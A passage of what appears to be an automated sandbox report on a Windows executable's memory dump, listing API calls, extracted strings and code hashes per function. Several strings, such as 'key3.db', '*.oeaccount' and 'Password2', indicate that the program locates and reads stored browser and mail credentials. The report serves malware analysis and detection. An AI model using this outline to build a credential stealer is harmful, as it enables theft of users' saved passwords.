                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414105
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                          • API String ID: 885266447-2471937615
                                          • Opcode ID: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
                                          • Instruction ID: 64d4eb81a265c1b05a2fdfc4674ac580571b80d59954343c28d6466173863d6d
                                          • Opcode Fuzzy Hash: 2e15f3014d93f2bb9130e9841e4fb77219e446d9f82deb2689d2d98ee362e802
                                          • Instruction Fuzzy Hash: 0331E1B1240700BFE7209F65CC49AA7B7E9FB94714F144A2EF951836C1E738EC948B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                          • String ID: C@$key3.db
                                          • API String ID: 1968906679-1993167907
                                          • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                          • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                          • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                          • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 3492281209-168460110
                                          • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                          • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                          • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                          • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat
                                          • String ID: 8D
                                          • API String ID: 3951308622-2703402624
                                          • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                          • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                          • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                          • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$_mbscpy
                                          • String ID: Password2
                                          • API String ID: 2600922555-1856559283
                                          • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                          • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                          • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                          • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                          • API String ID: 2574300362-543337301
                                          • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                          • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                          • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset
                                          • String ID: +MA$psow$winOpen
                                          • API String ID: 2221118986-3077801942
                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: $, $CREATE TABLE
                                          • API String ID: 3510742995-3459038510
                                          • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                          • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                          • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                          • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                          • memset.MSVCRT ref: 0040269F
                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                          • LocalFree.KERNEL32(?), ref: 00402798
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                          • String ID:
                                          • API String ID: 1593657333-0
                                          • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                          • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                          • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                          • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040C642
                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Message$MenuPostSendStringmemset
                                          • String ID:
                                          • API String ID: 3798638045-0
                                          • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                          • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                          • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                          • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                          • strlen.MSVCRT ref: 0040B366
                                          • atoi.MSVCRT ref: 0040B374
                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                          • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                          • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                          • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strlen.MSVCRT ref: 00407709
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                          • memcpy.MSVCRT ref: 0040776C
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                          • _mbscpy.MSVCRT ref: 004108E9
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                          • String ID:
                                          • API String ID: 1479990042-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                          • sprintf.MSVCRT ref: 0040B684
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                          • sprintf.MSVCRT ref: 0040B6AE
                                          • _mbscat.MSVCRT ref: 0040B6C1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _ultoasprintf
                                          • String ID: %s %s %s
                                          • API String ID: 432394123-3850900253
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                          • String ID: C@
                                          • API String ID: 1449862175-3201871010
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00409682
                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: 5\@
                                          • API String ID: 568519121-3174280609
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: L$ini
                                          • API String ID: 714388716-4234614086
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _msizerealloc
                                          • String ID: failed memory resize %u to %u bytes
                                          • API String ID: 2713192863-2134078882
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                          • strrchr.MSVCRT ref: 00409579
                                          • _mbscat.MSVCRT ref: 0040958E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID: 34@$Server Details
                                          • API String ID: 1096422788-1041202369
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%